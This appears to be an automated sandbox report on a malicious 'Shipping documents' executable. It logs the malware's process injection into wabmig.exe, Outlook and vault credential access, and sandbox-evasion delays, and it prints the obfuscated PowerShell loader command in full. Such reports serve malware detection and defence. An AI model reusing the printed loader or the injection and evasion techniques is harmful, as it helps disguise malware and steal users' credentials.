            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: schannel.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: mskeyprotect.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: ntasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: ncrypt.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: ncryptsslp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: gpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: vaultcli.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
            Source: Shipping documents 000022999878999800009999.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2768740707.00000000005FA000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: qm.Core.pdbE source: powershell.exe, 00000002.00000002.2775532254.0000000006CDD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbhx source: powershell.exe, 00000002.00000002.2779696439.0000000007FFE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.2779696439.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Yara match | File source: 00000008.00000002.3376516352.0000000004687000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2780799795.00000000094D7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Freethinker $Fieldmouse $Maalscorers), (Waxen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Bobles178 = [AppDomain]::CurrentDomain.GetAssemblies()$global
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Trachinus)), $Tenty132).DefineDynamicModule($Flugtskydningsbaner, $false).DefineType($Reconvoke, $Generalprverne, [System.MulticastDel
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0424A4ED pushad ; iretd | 2_2_0424A53B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0424E14C pushfd ; iretd | 2_2_0424E155
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0424CC1F pushfd ; iretd | 2_2_0424CC61
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0424CA88 push C807E588h; ret | 2_2_0424CA8D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_042415CC push ebx; iretd | 2_2_042415DA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04241D1C pushad ; retn 006Bh | 2_2_04241D92
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04241DA7 pushad ; retn 006Bh | 2_2_04241DB2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04241DB7 pushad ; retn 006Bh | 2_2_04241DB2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04241DBC pushad ; retn 006Bh | 2_2_04241DC2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04241AAC push ss; retf | 2_2_04241AC3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04241B64 push eax; retf | 2_2_04241B73
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04241B5C push eax; retf | 2_2_04241B63
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_06EF2525 push ebp; retf | 2_2_06EF252E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_06EF2538 push esp; retf | 2_2_06EF272A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_06EF236C push ebx; retf | 2_2_06EF237A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_06EF2160 push ebx; retf | 2_2_06EF217A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_06EFE174 push 84E80818h; iretd | 2_2_06EFE179
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_06EF0EF9 push eax; retf | 2_2_06EF0EFA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_06EF2E20 push esp; retf | 2_2_06EF305A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_06EFEDA8 push edx; ret | 2_2_06EFEDAB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_06EF2AD1 push esp; retf | 2_2_06EF2AD2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_06EF0850 push ecx; retf | 2_2_06EF09C2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_06EF2929 push ebp; retf | 2_2_06EF292A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_06EF3169 push edi; retf | 2_2_06EF316A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_06EF1EC4 push esi; retf | 2_2_06EF1ED2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_06EF1E79 push edx; retf | 2_2_06EF1E7A
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 8_2_00830C6D push edi; retf | 8_2_00830C7A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\acneform\Baroco\Shipping documents 000022999878999800009999.exe
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | File created: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; API/Special instruction interceptor: Address: 4EFF475
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Memory allocated: 830000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Memory allocated: 24150000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Memory allocated: 23FA0000 memory reserve | memory write watch
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 599888
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 599781
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 599671
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 599563
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 599453
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 599342
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 599234
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 599125
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 599016
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 598906
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 598797
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 598688
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 598563
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 598453
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 598344
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 598216
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 598110
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 597985
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 597860
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 597735
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 597610
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 597485
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 597360
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 597235
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 597117
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 597000
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 596888
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 596782
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 596672
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 596559
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 596453
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 596344
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 596232
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 596125
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 596015
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 595907
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 595782
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 595657
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 595532
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 595407
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 595297
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 595188
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 595063
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 594938
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 594813
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 594688
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 594578
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 594469
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Thread delayed: delay time: 594346
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6496
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3236
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Window / User API: threadDelayed 3352
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Window / User API: threadDelayed 6477
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5276; Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -24903104499507879s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 4592; Thread sleep count: 3352 > 30
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -599888s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 4592; Thread sleep count: 6477 > 30
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -599781s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -599671s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -599563s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -599453s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -599342s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -599234s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -599125s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -599016s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -598906s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -598797s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -598688s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -598563s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -598453s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -598344s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -598216s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -598110s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -597985s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -597860s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -597735s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -597610s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -597485s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -597360s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -597235s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -597117s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -597000s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -596888s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -596782s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -596672s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -596559s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -596453s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -596344s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -596232s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -596125s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -596015s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -595907s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -595782s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -595657s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -595532s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -595407s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -595297s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -595188s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -595063s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -594938s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -594813s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -594688s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -594578s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -594469s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948; Thread sleep time: -594346s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe; Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe; Code function: 0_2_00402910 FindFirstFileW,0_2_00402910
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe; Code function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe; File opened: C:\Users\user\AppData
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe; File opened: C:\Users\user
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe; File opened: C:\Users\user\AppData\Roaming
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: wabmig.exe, 00000008.00000002.3381693291.00000000086D8000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWp
            Source: wabmig.exe, 00000008.00000002.3381693291.000000000872F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
            Source: wabmig.exe, 00000008.00000002.3381693291.00000000086D8000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWK
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe; API call chain: ExitProcess graph end node (graph_0-3784)
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe; API call chain: ExitProcess graph end node (graph_0-3789)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_04247810 LdrInitializeThunk,2_2_04247810
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Process token adjusted: Debug
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Memory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 3AF0000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Memory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 83FBE0
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Nanometre76=Get-Content 'C:\Users\user\AppData\Local\acneform\Baroco\Tarsometatarsal.Pla';$Hulhedernes=$Nanometre76.SubString(27962,3);.$Hulhedernes($Nanometre76)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe; Code function: 0_2_6FE81096 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,lstrcmpiW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,lstrcpyW,GetTickCount,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,GetTickCount,ReadFile,IsTextUnicode,IsDBCSLeadByteEx,MultiByteToWideChar,lstrcpyW,GlobalReAlloc,lstrcpyW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalFree,0_2_6FE81096
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
